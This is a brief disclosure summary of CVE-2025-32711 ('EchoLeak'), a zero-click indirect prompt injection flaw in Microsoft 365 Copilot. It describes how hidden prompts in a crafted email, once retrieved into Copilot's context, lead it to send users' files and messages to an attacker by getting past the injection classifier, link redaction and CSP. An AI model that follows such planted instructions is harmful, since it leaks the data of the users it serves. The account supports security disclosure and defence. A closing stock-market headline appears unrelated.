CVE-2025-32711, dubbed 'EchoLeak' or 'Copilot SearchLeak,' is a zero-click indirect prompt injection vulnerability in Microsoft 365 Copilot disclosed by Aim Security researchers Pavan Reddy and Aditya Sanjay Gujral in June 2025. Rated critical (CVSS 9.3) by Microsoft, the flaw affects Copilot integrations across Word, Excel, PowerPoint, Outlook, and Teams. The attack embeds hidden prompts in a crafted email; when Copilot retrieves that email via its RAG context, it executes attacker-controlled instructions and exfiltrates sensitive data - chat logs, OneDrive files, SharePoint content, or Teams messages - to an attacker server, with no user interaction required. The exploit bypasses Microsoft's XPIA (Cross-Prompt Injection Attempt) classifier, link redaction, and Content Security Policy via an allowlisted Teams image proxy. Microsoft issued a server-side patch in June 2025 and confirmed no customer action is required and no known in-the-wild exploitation. Aim Security published a full academic case study at the AAAI Fall Symposium 2025.
Microsoft stock rises 5% as investors shift focus to software after Snowflake earnings spark sector rally